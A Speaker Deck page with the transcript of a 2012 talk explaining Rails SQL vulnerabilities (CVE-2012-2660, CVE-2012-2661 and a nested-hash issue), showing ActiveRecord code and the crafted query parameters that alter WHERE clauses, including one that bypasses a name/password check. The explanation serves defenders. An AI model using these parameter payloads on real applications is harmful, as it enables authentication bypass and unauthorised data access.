Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Sponsored
·
Ship Features Fearlessly
Turn features on and off without deploys. Used by thousands of Ruby developers.
→
Justin Collins
April 23, 2015
Programming
0
78
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
160
The Evolution of Rails Security
presidentbeef
1
840
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
150
Practical Static Analysis for Continuous Application Security
presidentbeef
0
220
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
470
Continuous Security with Practical Static Analysis
presidentbeef
1
340
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
260
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.2k
Tales from the Crypt
presidentbeef
1
260
Other Decks in Programming
See All in Programming
AIによる高速開発をどう制御するか? ガードレール設置で開発速度と品質を両立させたチームの事例
tonkotsuboy_com
7
2.4k
HTTPプロトコル正しく理解していますか? 〜かわいい猫と共に学ぼう。ฅ^•ω•^ฅ ニャ〜
hekuchan
2
690
OSSとなったswift-buildで Xcodeのビルドを差し替えられるため 自分でXcodeを直せる時代になっている ダイアモンド問題編
yimajo
3
620
例外処理とどう使い分ける?Result型を使ったエラー設計 #burikaigi
kajitack
16
6.1k
QAフローを最適化し、品質水準を満たしながらリリースまでの期間を最短化する #RSGT2026
shibayu36
2
4.4k
Claude Codeと2つの巻き戻し戦略 / Two Rewind Strategies with Claude Code
fruitriin
0
140
AgentCoreとHuman in the Loop
har1101
5
240
CSC307 Lecture 05
javiergs
PRO
0
500
「ブロックテーマでは再現できない」は本当か?
inc2734
0
1k
CSC307 Lecture 03
javiergs
PRO
1
490
Best-Practices-for-Cortex-Analyst-and-AI-Agent
ryotaroikeda
1
110
15年続くIoTサービスの SREエンジニアが挑む 分散トレーシング導入
melonps
2
220
Featured
See All Featured
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
133
19k
Documentation Writing (for coders)
carmenintech
77
5.3k
Building a Modern Day E-commerce SEO Strategy
aleyda
45
8.7k
From π to Pie charts
rasagy
0
130
SERP Conf. Vienna - Web Accessibility: Optimizing for Inclusivity and SEO
sarafernandez
1
1.3k
Claude Code どこまでも/ Claude Code Everywhere
nwiizo
61
52k
Raft: Consensus for Rubyists
vanstee
141
7.3k
Public Speaking Without Barfing On Your Shoes - THAT 2023
reverentgeek
1
310
CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again
sstephenson
162
16k
Java REST API Framework Comparison - PWX 2021
mraible
34
9.1k
Leo the Paperboy
mayatellez
4
1.4k
How to Ace a Technical Interview
jacobian
281
24k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1
presidentbeef
tonkotsuboy_com
hekuchan
yimajo
kajitack
shibayu36
fruitriin
har1101
javiergs
inc2734
ryotaroikeda
melonps
morganepeng
carmenintech
aleyda
rasagy
sarafernandez
nwiizo
vanstee
reverentgeek
sstephenson
mraible
mayatellez
jacobian
![ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_2.jpg){kind=link}
![Query Parameters ?name[] {"name"=>[nil]}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_3.jpg){kind=link}
![ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_4.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_7.jpg){kind=link}
![ActiveRecord Query User.where("users.name" => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_8.jpg){kind=link}
![Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_9.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name], :password => params[:password])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_13.jpg){kind=link}
![Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_14.jpg){kind=link}
